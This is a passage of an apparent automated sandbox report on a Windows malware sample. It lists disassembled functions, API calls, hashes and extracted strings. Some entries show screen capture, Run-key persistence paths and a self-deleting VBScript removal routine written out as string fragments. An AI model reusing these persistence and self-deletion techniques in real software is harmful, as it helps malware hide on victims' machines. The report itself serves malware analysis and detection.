                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 99518e0148a584110f8bf4689e731d5402797eff59b4f7bbd4ab81c0230e503e
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 9C11293B2007055FDB189F79D8916BAB7A1FF8031AB14442DE94647741D375B846C744
                                                                                                                                                                                                                                  Function 00450DDD Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 42COMMONLIBRARYCODE
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                    • Part of subcall function 00446EBF: GetLastError.KERNEL32(?,?,0043931C,?,?,?,0043E4CD,?,?,?,?,00000000,?,?,0042CE53,0000003B), ref: 00446EC3
                                                                                                                                                                                                                                    • Part of subcall function 00446EBF: _free.LIBCMT ref: 00446EF6
                                                                                                                                                                                                                                    • Part of subcall function 00446EBF: SetLastError.KERNEL32(00000000,0043E4CD,?,?,?,?,00000000,?,?,0042CE53,0000003B,?,00000041,00000000,00000000), ref: 00446F37
                                                                                                                                                                                                                                    • Part of subcall function 00446EBF: _abort.LIBCMT ref: 00446F3D
                                                                                                                                                                                                                                  • EnumSystemLocalesW.KERNEL32(004510BA,00000001,?,?,<D,?,0045145B,<D,?,?,?,?,?,00443CEC,?,?), ref: 00450E29
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000C.00000002.3857869993.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3857869993.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3857869993.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: ErrorLast$EnumLocalesSystem_abort_free
                                                                                                                                                                                                                                  • String ID: <D
                                                                                                                                                                                                                                  • API String ID: 1084509184-3866323178
                                                                                                                                                                                                                                  • Opcode ID: e0c48b72e2c1269c4cdc51d0e461bd75820cdd7fcb75359b91497d16354a5322
                                                                                                                                                                                                                                  • Instruction ID: d323619e2976bd52c5edaa4f55efd93dda7e8b303aa23e489220a9c0c916f3e4
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: e0c48b72e2c1269c4cdc51d0e461bd75820cdd7fcb75359b91497d16354a5322
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 5BF0223A2003045FDB145F3AD882AAB7B95EF81729B25842EFD058B782D275AC42C644
                                                                                                                                                                                                                                  Function 00447597 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 37COMMONLIBRARYCODE
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • GetLocaleInfoW.KERNEL32(00000000,00000002,00000000,?,20001004,?,20001004,?,00000002,?,?,?,?,00000004), ref: 004475EA
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000C.00000002.3857869993.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3857869993.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3857869993.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: InfoLocale
                                                                                                                                                                                                                                  • String ID: GetLocaleInfoEx
                                                                                                                                                                                                                                  • API String ID: 2299586839-2904428671
                                                                                                                                                                                                                                  • Opcode ID: 8dab955c83ead38f4190d8cd68b3baa1d28bcda2227728d0cef18aa89ebed625
                                                                                                                                                                                                                                  • Instruction ID: 80a81796b135a3e0eaabc3ca7fb48afb6b687e063e78a0117ef0368584b3b56e
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 8dab955c83ead38f4190d8cd68b3baa1d28bcda2227728d0cef18aa89ebed625
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 82F0F031A44308BBDB11AF61EC06F6E7B25EF04712F00416AFC046A2A2CB359E11969E
                                                                                                                                                                                                                                  Function 004510BA Relevance: 1.6, APIs: 1, Instructions: 83COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                    • Part of subcall function 00446EBF: GetLastError.KERNEL32(?,?,0043931C,?,?,?,0043E4CD,?,?,?,?,00000000,?,?,0042CE53,0000003B), ref: 00446EC3
                                                                                                                                                                                                                                    • Part of subcall function 00446EBF: _free.LIBCMT ref: 00446EF6
                                                                                                                                                                                                                                    • Part of subcall function 00446EBF: SetLastError.KERNEL32(00000000,0043E4CD,?,?,?,?,00000000,?,?,0042CE53,0000003B,?,00000041,00000000,00000000), ref: 00446F37
                                                                                                                                                                                                                                    • Part of subcall function 00446EBF: _abort.LIBCMT ref: 00446F3D
                                                                                                                                                                                                                                    • Part of subcall function 00446EBF: _free.LIBCMT ref: 00446F1E
                                                                                                                                                                                                                                    • Part of subcall function 00446EBF: SetLastError.KERNEL32(00000000,0043E4CD,?,?,?,?,00000000,?,?,0042CE53,0000003B,?,00000041,00000000,00000000), ref: 00446F2B
                                                                                                                                                                                                                                  • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 0045110E
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000C.00000002.3857869993.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3857869993.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3857869993.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: ErrorLast$_free$InfoLocale_abort
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 1663032902-0
                                                                                                                                                                                                                                  • Opcode ID: 9286f156abac91c7ed9d9ee6f3e5b08bc3c26a4b89b9db52a82557d4143127a2
                                                                                                                                                                                                                                  • Instruction ID: 725ff80feb3504da526bb6f16fdbe645276de1ecdd37ac2f1e7666d8a95350e0
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 9286f156abac91c7ed9d9ee6f3e5b08bc3c26a4b89b9db52a82557d4143127a2
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 2D21B332500606ABDB249A25DC46B7B73A8EB09316F1041BBFE01C6252EB79DD48CB99
                                                                                                                                                                                                                                  Function 004512EA Relevance: 1.5, APIs: 1, Instructions: 46COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                    • Part of subcall function 00446EBF: GetLastError.KERNEL32(?,?,0043931C,?,?,?,0043E4CD,?,?,?,?,00000000,?,?,0042CE53,0000003B), ref: 00446EC3
                                                                                                                                                                                                                                    • Part of subcall function 00446EBF: _free.LIBCMT ref: 00446EF6
                                                                                                                                                                                                                                    • Part of subcall function 00446EBF: SetLastError.KERNEL32(00000000,0043E4CD,?,?,?,?,00000000,?,?,0042CE53,0000003B,?,00000041,00000000,00000000), ref: 00446F37
                                                                                                                                                                                                                                    • Part of subcall function 00446EBF: _abort.LIBCMT ref: 00446F3D
                                                                                                                                                                                                                                  • GetLocaleInfoW.KERNEL32(?,20000001,?,00000002,?,00000000,?,?,00451088,00000000,00000000,?), ref: 00451316
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000C.00000002.3857869993.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3857869993.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3857869993.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: ErrorLast$InfoLocale_abort_free
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 2692324296-0
                                                                                                                                                                                                                                  • Opcode ID: b6b1206c8d774c000a1b4b507e47eef55c4aaf57ff81984432bbf3fd36f42e7a
                                                                                                                                                                                                                                  • Instruction ID: 964a9937ac5a020d26487979adcc3deadbef587b10f76395f6381cc8137ce6dd
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: b6b1206c8d774c000a1b4b507e47eef55c4aaf57ff81984432bbf3fd36f42e7a
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 10F07D32500111BBEB286A25CC16BFF7758EB00716F15046BEC06A3651FA38FD49C6D4
                                                                                                                                                                                                                                  Function 004470AE Relevance: 1.5, APIs: 1, Instructions: 34COMMONLIBRARYCODE
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                    • Part of subcall function 00444ACC: EnterCriticalSection.KERNEL32(?,?,0044225B,00000000,0046DAC0,0000000C,00442216,?,?,?,00448739,?,?,00446F74,00000001,00000364), ref: 00444ADB
                                                                                                                                                                                                                                  • EnumSystemLocalesW.KERNEL32(00447068,00000001,0046DC48,0000000C), ref: 004470E6
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000C.00000002.3857869993.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3857869993.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3857869993.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: CriticalEnterEnumLocalesSectionSystem
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 1272433827-0
                                                                                                                                                                                                                                  • Opcode ID: 294c88a1965c44704c377604ff0a5917817e93c6b6b84f866ad5a3c5a2dedf6a
                                                                                                                                                                                                                                  • Instruction ID: 877f7ae5c491a2fbf36f534f7b8138893028b6a81f24f5c3744eb9f6a7677366
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 294c88a1965c44704c377604ff0a5917817e93c6b6b84f866ad5a3c5a2dedf6a
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: F6F04932A10200EFEB04EF68E806B4D77B0EB44725F10816AF414DB2E2DB7889818B49
                                                                                                                                                                                                                                  Function 00450CF7 Relevance: 1.5, APIs: 1, Instructions: 31COMMONLIBRARYCODE
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                    • Part of subcall function 00446EBF: GetLastError.KERNEL32(?,?,0043931C,?,?,?,0043E4CD,?,?,?,?,00000000,?,?,0042CE53,0000003B), ref: 00446EC3
                                                                                                                                                                                                                                    • Part of subcall function 00446EBF: _free.LIBCMT ref: 00446EF6
                                                                                                                                                                                                                                    • Part of subcall function 00446EBF: SetLastError.KERNEL32(00000000,0043E4CD,?,?,?,?,00000000,?,?,0042CE53,0000003B,?,00000041,00000000,00000000), ref: 00446F37
                                                                                                                                                                                                                                    • Part of subcall function 00446EBF: _abort.LIBCMT ref: 00446F3D
                                                                                                                                                                                                                                  • EnumSystemLocalesW.KERNEL32(00450C4E,00000001,?,?,?,004514B9,<D,?,?,?,?,?,00443CEC,?,?,?), ref: 00450D2E
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000C.00000002.3857869993.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3857869993.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3857869993.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: ErrorLast$EnumLocalesSystem_abort_free
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 1084509184-0
                                                                                                                                                                                                                                  • Opcode ID: 8c2bccbfd0fc102635c006ca31f830fd57f68f19690e6c985b1f52cdbb333b18
                                                                                                                                                                                                                                  • Instruction ID: ec648f77c102ae861fabd43d141f98194b25f4d0b1f390d0839222eb7000fb0b
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 8c2bccbfd0fc102635c006ca31f830fd57f68f19690e6c985b1f52cdbb333b18
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: CBF05C3D30020557CB159F35D81576B7F94EFC2711B07405AFE098B381C239D846C754
                                                                                                                                                                                                                                  Function 00433CD7 Relevance: 1.5, APIs: 1, Instructions: 3COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • SetUnhandledExceptionFilter.KERNEL32(Function_00033CE3,004339B1), ref: 00433CDC
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000C.00000002.3857869993.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3857869993.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3857869993.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: ExceptionFilterUnhandled
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 3192549508-0
                                                                                                                                                                                                                                  • Opcode ID: 3670727f3e8651977646328ecd403d2a1b3c6ba49dd5bfb528ab2007e995f695
                                                                                                                                                                                                                                  • Instruction ID: 83953e3dca8a62111c248ad4478ddd9c1373f985a30770e5fc8846644fe13ce9
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 3670727f3e8651977646328ecd403d2a1b3c6ba49dd5bfb528ab2007e995f695
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash:
                                                                                                                                                                                                                                  Function 00417F9F Relevance: 52.8, APIs: 29, Strings: 1, Instructions: 324windowmemoryCOMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • CreateDCA.GDI32(DISPLAY,00000000,00000000,00000000), ref: 00417FB9
                                                                                                                                                                                                                                  • CreateCompatibleDC.GDI32(00000000), ref: 00417FC4
                                                                                                                                                                                                                                    • Part of subcall function 00418452: EnumDisplaySettingsW.USER32(?,000000FF,?), ref: 00418482
                                                                                                                                                                                                                                  • CreateCompatibleBitmap.GDI32(?,00000000), ref: 00418045
                                                                                                                                                                                                                                  • DeleteDC.GDI32(?), ref: 0041805D
                                                                                                                                                                                                                                  • DeleteDC.GDI32(00000000), ref: 00418060
                                                                                                                                                                                                                                  • SelectObject.GDI32(00000000,00000000), ref: 0041806B
                                                                                                                                                                                                                                  • StretchBlt.GDI32(00000000,00000000,00000000,00000000,?,?,?,?,00000000,?,00CC0020), ref: 00418093
                                                                                                                                                                                                                                  • GetCursorInfo.USER32(?), ref: 004180B5
                                                                                                                                                                                                                                  • GetIconInfo.USER32(?,?), ref: 004180CB
                                                                                                                                                                                                                                  • DeleteObject.GDI32(?), ref: 004180FA
                                                                                                                                                                                                                                  • DeleteObject.GDI32(?), ref: 00418107
                                                                                                                                                                                                                                  • DrawIcon.USER32(00000000,?,?,?), ref: 00418114
                                                                                                                                                                                                                                  • BitBlt.GDI32(00000000,00000000,00000000,00000000,?,00000000,00000000,00000000,00660046), ref: 00418144
                                                                                                                                                                                                                                  • GetObjectA.GDI32(?,00000018,?), ref: 00418173
                                                                                                                                                                                                                                  • LocalAlloc.KERNEL32(00000040,00000028), ref: 004181BC
                                                                                                                                                                                                                                  • LocalAlloc.KERNEL32(00000040,00000001), ref: 004181DF
                                                                                                                                                                                                                                  • GlobalAlloc.KERNEL32(00000000,?), ref: 00418248
                                                                                                                                                                                                                                  • GetDIBits.GDI32(00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 0041826B
                                                                                                                                                                                                                                  • DeleteDC.GDI32(?), ref: 0041827F
                                                                                                                                                                                                                                  • DeleteDC.GDI32(00000000), ref: 00418282
                                                                                                                                                                                                                                  • DeleteObject.GDI32(00000000), ref: 00418285
                                                                                                                                                                                                                                  • GlobalFree.KERNEL32(00CC0020), ref: 00418290
                                                                                                                                                                                                                                  • DeleteObject.GDI32(00000000), ref: 00418344
                                                                                                                                                                                                                                  • GlobalFree.KERNEL32(?), ref: 0041834B
                                                                                                                                                                                                                                  • DeleteDC.GDI32(?), ref: 0041835B
                                                                                                                                                                                                                                  • DeleteDC.GDI32(00000000), ref: 00418366
                                                                                                                                                                                                                                  • DeleteDC.GDI32(?), ref: 00418398
                                                                                                                                                                                                                                  • DeleteDC.GDI32(00000000), ref: 0041839B
                                                                                                                                                                                                                                  • DeleteObject.GDI32(?), ref: 004183A1
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000C.00000002.3857869993.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3857869993.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3857869993.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: Delete$Object$AllocCreateGlobal$CompatibleFreeIconInfoLocal$BitmapBitsCursorDisplayDrawEnumSelectSettingsStretch
                                                                                                                                                                                                                                  • String ID: DISPLAY
                                                                                                                                                                                                                                  • API String ID: 1352755160-865373369
                                                                                                                                                                                                                                  • Opcode ID: 360205e778a26539c0e24db7fcbc6f0d40d0a456e06353622c31b649bf5ecbc7
                                                                                                                                                                                                                                  • Instruction ID: f05cd178694609e891ba83f5bdf02bb76ea447df34f4969275af8919d08089d1
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 360205e778a26539c0e24db7fcbc6f0d40d0a456e06353622c31b649bf5ecbc7
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 12C17C31508345AFD3209F25DC44BABBBE9FF88751F04082EF989932A1DB34E945CB5A
                                                                                                                                                                                                                                  Function 004112B5 Relevance: 43.9, APIs: 17, Strings: 8, Instructions: 189synchronizationsleepfileCOMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • CreateMutexA.KERNEL32(00000000,00000001,00000000,004742F8,?,00000000), ref: 004112D4
                                                                                                                                                                                                                                  • ExitProcess.KERNEL32 ref: 0041151D
                                                                                                                                                                                                                                    • Part of subcall function 0041265D: RegOpenKeyExA.KERNEL32(80000001,00000000,00000000,00020019,00000000,004742F8), ref: 00412679
                                                                                                                                                                                                                                    • Part of subcall function 0041265D: RegQueryValueExA.KERNEL32(00000000,00000000,00000000,00000000,00000208,?), ref: 00412692
                                                                                                                                                                                                                                    • Part of subcall function 0041265D: RegCloseKey.KERNEL32(00000000), ref: 0041269D
                                                                                                                                                                                                                                    • Part of subcall function 0041B61A: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000,?,?,?,00000000,00409F65), ref: 0041B633
                                                                                                                                                                                                                                  • CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000,?,?,?,?,00000000), ref: 0041135B
                                                                                                                                                                                                                                  • OpenProcess.KERNEL32(00100000,00000000,T@,?,?,?,?,00000000), ref: 0041136A
                                                                                                                                                                                                                                  • WaitForSingleObject.KERNEL32(00000000,000000FF,?,?,?,?,00000000), ref: 00411375
                                                                                                                                                                                                                                  • CloseHandle.KERNEL32(00000000,?,?,?,?,00000000), ref: 0041137C
                                                                                                                                                                                                                                  • GetCurrentProcessId.KERNEL32(?,?,?,?,00000000), ref: 00411382
                                                                                                                                                                                                                                    • Part of subcall function 004127D5: RegCreateKeyA.ADVAPI32(80000001,00000000,TUF), ref: 004127E3
                                                                                                                                                                                                                                    • Part of subcall function 004127D5: RegSetValueExA.KERNEL32(TUF,000000AF,00000000,00000004,00000001,00000004,?,?,?,0040B94C,004660E0,00000001,000000AF,00465554), ref: 004127FE
                                                                                                                                                                                                                                    • Part of subcall function 004127D5: RegCloseKey.ADVAPI32(?,?,?,?,0040B94C,004660E0,00000001,000000AF,00465554), ref: 00412809
                                                                                                                                                                                                                                  • PathFileExistsW.SHLWAPI(?,?,?,?,?,00000000), ref: 004113B3
                                                                                                                                                                                                                                  • GetTempPathW.KERNEL32(00000104,?,?,?,?,?,?,?,?,00000000), ref: 0041140F
                                                                                                                                                                                                                                  • GetTempFileNameW.KERNEL32(?,temp_,00000000,?,?,?,?,?,?,?,?,00000000), ref: 00411429
                                                                                                                                                                                                                                  • lstrcatW.KERNEL32(?,.exe,?,?,?,?,?,?,?,00000000), ref: 0041143B
                                                                                                                                                                                                                                    • Part of subcall function 0041B58F: SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002), ref: 0041B5EB
                                                                                                                                                                                                                                    • Part of subcall function 0041B58F: WriteFile.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 0041B5FF
                                                                                                                                                                                                                                    • Part of subcall function 0041B58F: CloseHandle.KERNEL32(00000000), ref: 0041B60C
                                                                                                                                                                                                                                  • ShellExecuteW.SHELL32(00000000,open,?,00000000,00000000,00000001), ref: 00411483
                                                                                                                                                                                                                                  • Sleep.KERNEL32(000001F4,?,?,?,?,00000000), ref: 004114C4
                                                                                                                                                                                                                                  • OpenProcess.KERNEL32(00100000,00000000,?,?,?,?,?,00000000), ref: 004114D9
                                                                                                                                                                                                                                  • WaitForSingleObject.KERNEL32(00000000,000000FF,?,?,?,?,00000000), ref: 004114E4
                                                                                                                                                                                                                                  • CloseHandle.KERNEL32(00000000,?,?,?,?,00000000), ref: 004114EB
                                                                                                                                                                                                                                  • GetCurrentProcessId.KERNEL32(?,?,?,?,00000000), ref: 004114F1
                                                                                                                                                                                                                                    • Part of subcall function 0041B58F: CreateFileW.KERNEL32(00000000,40000000,00000000,00000000,00000002,00000080,00000000,00000000,00000000,00465900,00000000,00000000,0040C267,00000000,00000000,fso.DeleteFile(Wscript.ScriptFullName)), ref: 0041B5CE
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000C.00000002.3857869993.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3857869993.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3857869993.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: File$CloseCreateProcess$HandleOpen$CurrentObjectPathSingleTempValueWait$ExecuteExistsExitMutexNamePointerQueryShellSleepWritelstrcat
                                                                                                                                                                                                                                  • String ID: .exe$0DG$@CG$T@$WDH$exepath$open$temp_
                                                                                                                                                                                                                                  • API String ID: 4250697656-2665858469
                                                                                                                                                                                                                                  • Opcode ID: c45581ac137712a93e0a6d9d7403759df41187074cfe6de530b3a898dba868e6
                                                                                                                                                                                                                                  • Instruction ID: b1cd6038c3dd2fca16f1d1fb39a824579eeb1b45f376adef666059b0b2e54ae4
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: c45581ac137712a93e0a6d9d7403759df41187074cfe6de530b3a898dba868e6
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: D751B671A043156BDB00A7A0AC49EFE736D9B44715F1041BBF905A72D2EF7C8E828A9D
                                                                                                                                                                                                                                  Function 0040C28E Relevance: 42.3, APIs: 6, Strings: 18, Instructions: 282registryCOMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                    • Part of subcall function 00411699: TerminateProcess.KERNEL32(00000000,pth_unenc,0040E670), ref: 004116A9
                                                                                                                                                                                                                                    • Part of subcall function 00411699: WaitForSingleObject.KERNEL32(000000FF), ref: 004116BC
                                                                                                                                                                                                                                  • GetModuleFileNameW.KERNEL32(00000000,?,00000208,?,?,00000000), ref: 0040C38B
                                                                                                                                                                                                                                  • RegDeleteKeyA.ADVAPI32(80000001,00000000), ref: 0040C39E
                                                                                                                                                                                                                                  • SetFileAttributesW.KERNEL32(?,00000080,?,?,00000000), ref: 0040C3B7
                                                                                                                                                                                                                                  • SetFileAttributesW.KERNEL32(00000000,00000080,?,?,00000000), ref: 0040C3E7
                                                                                                                                                                                                                                    • Part of subcall function 0040AFBA: TerminateThread.KERNEL32(004099A9,00000000,004742F8,pth_unenc,0040BF26,004742E0,004742F8,?,pth_unenc), ref: 0040AFC9
                                                                                                                                                                                                                                    • Part of subcall function 0040AFBA: UnhookWindowsHookEx.USER32(004740F8), ref: 0040AFD5
                                                                                                                                                                                                                                    • Part of subcall function 0040AFBA: TerminateThread.KERNEL32(00409993,00000000,?,pth_unenc), ref: 0040AFE3
                                                                                                                                                                                                                                    • Part of subcall function 0041B58F: CreateFileW.KERNEL32(00000000,40000000,00000000,00000000,00000002,00000080,00000000,00000000,00000000,00465900,00000000,00000000,0040C267,00000000,00000000,fso.DeleteFile(Wscript.ScriptFullName)), ref: 0041B5CE
                                                                                                                                                                                                                                  • ShellExecuteW.SHELL32(00000000,open,00000000,00465900,00465900,00000000), ref: 0040C632
                                                                                                                                                                                                                                  • ExitProcess.KERNEL32 ref: 0040C63E
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000C.00000002.3857869993.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3857869993.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3857869993.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: File$Terminate$AttributesProcessThread$CreateDeleteExecuteExitHookModuleNameObjectShellSingleUnhookWaitWindows
                                                                                                                                                                                                                                  • String ID: """, 0$")$@CG$CreateObject("WScript.Shell").Run "cmd /c ""$On Error Resume Next$Set fso = CreateObject("Scripting.FileSystemObject")$Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\$Software\Microsoft\Windows\CurrentVersion\Run\$Temp$\update.vbs$`=G$exepath$fso.DeleteFile "$fso.DeleteFile(Wscript.ScriptFullName)$fso.DeleteFolder "$open$wend$while fso.FileExists("
                                                                                                                                                                                                                                  • API String ID: 1861856835-3168347843
                                                                                                                                                                                                                                  • Opcode ID: e0ff0afc4033c8097fa85024f27eb8d2cb461690346b9c5d2a3b848a4b1a1dc9
                                                                                                                                                                                                                                  • Instruction ID: c8b5e11b4abf5c95f8ab28b2bb359051ef64700817c412cd349ec45860bdb676
